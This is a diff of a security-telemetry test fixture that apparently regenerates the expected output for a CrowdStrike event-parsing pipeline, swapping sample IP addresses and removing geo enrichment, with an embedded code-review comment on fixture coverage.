"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", "created": "2020-11-08T17:05:00.030Z", "kind": "event", "action": "ProcessRollup2", 
@@ -7125,21 +6269,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.144.255", - "vendor": "crowdstrike", - "ip": "208.216.144.255", "serial_number": "ffffffff4f1444bab96568879cb43556", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:04:55.961Z", "ecs": { 
@@ -7147,18 +6282,18 @@ }, "related": { "hosts": [ - "208.216.144.255" + "67.43.156.13" ], "hash": [ "2784638081" ], "ip": [ - "208.216.144.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465981800Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"208.216.144.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", + "ingested": "2021-12-09T13:36:11.151092400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", "created": "2020-11-08T17:04:59.913Z", "kind": "event", "action": "DnsRequest", 
@@ -7199,21 +6334,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.197", - "vendor": "crowdstrike", - "ip": "208.216.150.197", "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0009806.1" + "version": "1007.8.0009806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:01.645Z", "file": { 
@@ -7227,18 +6353,18 @@ }, "related": { "hosts": [ - "208.216.150.197" + "67.43.156.13" ], "hash": [ "4288861242" ], "ip": [ - "208.216.150.197" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465991100Z", - "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"208.216.150.197\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", + "ingested": "2021-12-09T13:36:11.151098800Z", + "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", "created": "2020-11-08T17:05:02.247Z", "kind": "alert", "action": "CriticalFileAccessed", 
@@ -7299,21 +6425,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.14.207.30", - "vendor": "crowdstrike", - "ip": "208.14.207.30", "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009304.1" + "version": "1007.4.0009304.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:09.180Z", "ecs": { @@ -7321,7 +6438,7 @@ }, "related": { "hosts": [ - "208.14.207.30" + "67.43.156.14" ], "hash": [ "d51cef1b288e2032aee9805deff04bfd", 
@@ -7329,12 +6446,12 @@ "3344040805" ], "ip": [ - "208.14.207.30" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465998200Z", - "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"208.14.207.30\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", + "ingested": "2021-12-09T13:36:11.151105100Z", + "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - 
/Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", "created": "2020-11-08T17:05:09.180Z", "kind": "event", "action": "ProcessRollup2", 
@@ -7389,21 +6506,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.150.210",
- "vendor": "crowdstrike",
- "ip": "208.216.150.210",
 "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:05:14.133Z",
 "file": {
@@ -7419,18 +6527,18 @@ }, "related": { "hosts": [ - "208.216.150.210" + "67.43.156.13" ], "hash": [ "3899738370" ], "ip": [ - "208.216.150.210" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466005Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"208.216.150.210\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", + "ingested": "2021-12-09T13:36:11.151111400Z", + "original": 
"{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", "created": "2020-11-08T17:05:14.427Z", "kind": "event", "action": "NewScriptWritten", @@ -7470,27 +6578,9 @@ "type": "macos" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WI", - "city_name": "Superior", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Wisconsin", - "location": { - "lon": -92.095, - "lat": 46.7045 - } - }, - "as": { - "number": 3789, - "organization": { - "name": "Essentia Health East" - } - }, - "address": "208.72.48.107", "port": 443, - "ip": "208.72.48.107" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 0, 
@@ -7509,21 +6599,12 @@
 "direction": "inbound"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.150.211",
- "vendor": "crowdstrike",
- "ip": "208.216.150.211",
 "serial_number": "ffffffffd4094240a6b1d12aaf304f4f",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.4.0012205.1"
+ "version": "1007.4.0012205.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:05:16.421Z",
 "ecs": {
@@ -7531,22 +6612,22 @@ }, "related": { "hosts": [ - "208.216.150.211", + "67.43.156.13", "0.0.0.0", - "208.72.48.107" + "67.43.156.14" ], "hash": [ "1306766522" ], "ip": [ - "208.216.150.211", + "67.43.156.13", "0.0.0.0", - "208.72.48.107" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466011700Z", - "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"208.72.48.107\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"208.216.150.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", + "ingested": "2021-12-09T13:36:11.151117800Z", + "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", "created": "2020-11-08T17:05:16.502Z", "kind": "event", "action": "NetworkConnectIP4", 
@@ -7577,44 +6658,14 @@
 "type": "windows"
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 6296,
- "organization": {
- "name": "InfoStructure"
- }
- },
- "address": "208.91.140.216",
 "port": 443,
- "ip": "208.91.140.216"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "as": {
- "number": 1239,
- "organization": {
- "name": "Sprint"
- }
- },
- "address": "208.22.254.101",
 "port": 53961,
- "ip": "208.22.254.101"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "url": {
 "scheme": "http"
@@ -7623,27 +6674,18 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:Xm3jgwymKS3jTxcXdD1IsruCeU8=",
+ "community_id": "1:gnQhhn0wJhJU+wrHlczmnm7THKs=",
 "transport": "tcp",
 "iana_number": "6",
 "direction": "outbound"
 },
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.150.194",
- "vendor": "crowdstrike",
- "ip": "208.216.150.194",
 "serial_number": "fffffffff000426eb99afaa2ccdcbc17",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:05:16.849Z",
 "ecs": {
@@ -7651,22 +6693,20 @@ }, "related": { "hosts": [ - "208.216.150.194", - "208.22.254.101", - "208.91.140.216" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "2602391615" ], "ip": [ - "208.216.150.194", - "208.22.254.101", - "208.91.140.216" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466018500Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"208.22.254.101\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"208.91.140.216\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"208.216.150.194\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", + "ingested": "2021-12-09T13:36:11.151124100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"67.43.156.14\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", "created": "2020-11-08T17:05:16.942Z", "kind": "event", "action": "NetworkConnectIP4", 
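Review bot: The regenerated NetworkConnectIP4 expectation in this hunk now carries the same address, 67.43.156.14, in both `LocalAddressIP4` and `RemoteAddressIP4`, so `related.ip` collapses from three entries to two and the fixture can no longer demonstrate that source.ip and destination.ip are populated from distinct input fields; the destination/source hunk just above (`@@ -7577`) has the same collapse. Using a second address from the supported range for one side would preserve the original coverage without leaving the subset. Separately, every observer block in this file has lost its geo object outright (first at `@@ -7299`, repeated through `@@ -8361`), which reads as the GeoIP enrichment not producing a result for the new addresses rather than producing a different one; if the supported subset is meant to yield deterministic geo data, it is worth confirming that the absence is intended before committing the regenerated output.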
@@ -7707,21 +6747,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.216.128.255",
- "vendor": "crowdstrike",
- "ip": "208.216.128.255",
 "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579",
+ "address": "67.43.156.13",
 "type": "agent",
- "version": "1007.3.0011603.1"
+ "version": "1007.3.0011603.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.13"
 },
 "@timestamp": "2020-11-08T17:04:51.781Z",
 "ecs": {
@@ -7733,18 +6764,18 @@ "user4" ], "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466025200Z", - "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", + "ingested": "2021-12-09T13:36:11.151130300Z", + "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT 
AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", "created": "2020-11-08T17:05:21.077Z", "kind": "event", "action": "UserLogon", @@ -7797,21 +6828,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.144.255", - "vendor": "crowdstrike", - "ip": "208.216.144.255", "serial_number": "ffffffff2c47454cba360bc404a607bb", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:20.785Z", "file": { 
@@ -7832,19 +6854,19 @@ }, "related": { "hosts": [ - "208.216.144.255" + "67.43.156.13" ], "hash": [ "d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182", "3011122681" ], "ip": [ - "208.216.144.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466032Z", - "original": "{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"208.216.144.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", + "ingested": "2021-12-09T13:36:11.151136700Z", + "original": 
"{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", "created": "2020-11-08T17:05:21.109Z", "kind": "event", "action": "PeFileWritten", @@ -7887,21 +6909,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.211", - "vendor": "crowdstrike", - "ip": "208.216.134.211", "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:34.461Z", "ecs": { 
